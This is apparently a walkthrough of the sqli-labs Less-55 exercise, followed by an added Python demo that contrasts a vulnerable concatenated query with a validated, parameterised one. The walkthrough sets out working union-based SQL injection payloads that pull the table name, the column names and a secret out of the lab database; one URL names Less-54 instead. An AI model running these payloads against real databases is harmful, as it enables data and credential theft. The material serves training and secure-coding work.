Chicken dinner! Let's keep going~

http://sqlilabs/Less-55/?id=1' returns an error
http://sqlilabs/Less-55/?id=1'%23 returns an error
http://sqlilabs/Less-55/?id=1')%23 returns an error
http://sqlilabs/Less-55/?id=1'))%23 returns an error
http://sqlilabs/Less-55/?id=1')))%23 returns an error

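...and just like that, five attempts were gone. Sticking to my stubborn refusal to look at the SQL, I tried double quotes as well, but it still returned an error. Right, so only one possibility was left: try a parenthesis? ...At this point I wanted to curse... because that really was it.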

http://sqlilabs/Less-55/?id=-1) union select 1,(select table_name from information_schema.tables where table_schema=database()),3%23

Table name obtained: rq27n6wrrp

http://sqlilabs/Less-55/?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='rq27n6wrrp'),3%23

Column names obtained: id,sessid,secret_F3GH,tryy

http://sqlilabs/Less-54/?id=-1) union select 1,(select group_concat(secret_F3GH) from rq27n6wrrp),3%23

Password obtained: U8xUjN0vel0kzfTr5XOqtiG5

Get it!!!

:D
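
Why the quote guesses error out while a bare parenthesis works, and what closes the hole, as an added example that is not part of the original post or of sqli-labs. It assumes the lab builds its query as WHERE id=($id) (inferred from the payload that worked), uses SQLite in place of MySQL (so the comment marker is "--" rather than "#"), and all table, column and function names are hypothetical.

```python
import sqlite3

# Constructed payload in the shape used above; SQLite comment "--" replaces MySQL "#".
PAYLOAD = "-1) union select 1,(select secret_key from challenge),3 -- "

def make_db():
    """In-memory database with constructed data; all names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb');
        CREATE TABLE challenge (secret_key TEXT);
        INSERT INTO challenge VALUES ('CONSTRUCTED-SECRET');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # Assumed query shape: the id is concatenated, unquoted, inside parentheses.
    sql = ("SELECT id, username, password FROM users "
           "WHERE id=(" + raw_id + ") LIMIT 0,1")
    return db.execute(sql).fetchall()

def lookup_safe(db, raw_id):
    # Reject anything that is not a plain decimal id, then bind the value so it
    # is never parsed as SQL text.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []
    sql = "SELECT id, username, password FROM users WHERE id=(?) LIMIT 0,1"
    return db.execute(sql, (int(raw_id),)).fetchall()

def quote_breaks_query(db, raw_id):
    # A stray quote leaves the statement unparseable: the "returns an error" case.
    try:
        lookup_vulnerable(db, raw_id)
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    print(quote_breaks_query(db, "1'"))
    print(lookup_vulnerable(db, PAYLOAD))
    print(lookup_safe(db, PAYLOAD))
    print(lookup_safe(db, "1"))
```
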